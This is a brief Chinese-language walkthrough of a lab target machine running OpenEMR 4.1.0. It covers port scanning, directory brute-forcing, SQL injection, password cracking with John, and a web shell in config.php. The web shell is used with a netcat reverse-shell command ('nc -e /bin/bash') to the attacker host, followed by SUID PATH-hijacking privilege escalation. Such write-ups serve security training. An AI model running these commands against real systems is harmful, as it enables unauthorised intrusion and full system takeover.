kali：192.168.111.111

靶机：192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

目录爆破

feroxbuster -k -d 1 --url http://192.168.111.130  -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh -t 1 -e -C 404

访问openemr目录，同时发现openemr版本为4.1.0

搜索该版本漏洞，发现存在sql注入

searchsploit openemr 4.1.0

漏洞利用

利用exp进行sql注入

john爆破密文

john hash --wordlist=/usr/share/wordlists/rockyou.txt

得到admin的密码ackbar，登录后台

修改网站源码写入一句话木马

访问http://192.168.111.130/openemr/sites/default/config.php?cmd=nc -e /bin/bash 192.168.111.111 4444，获得反弹shell

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

发现/usr/bin/healthcheck该文件会执行ifconfig

修改环境变量提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/ifconfig
chmod 777 /tmp/ifconfig
export PATH=/tmp:$PATH
/usr/bin/healthcheck
/tmp/bash -p

flag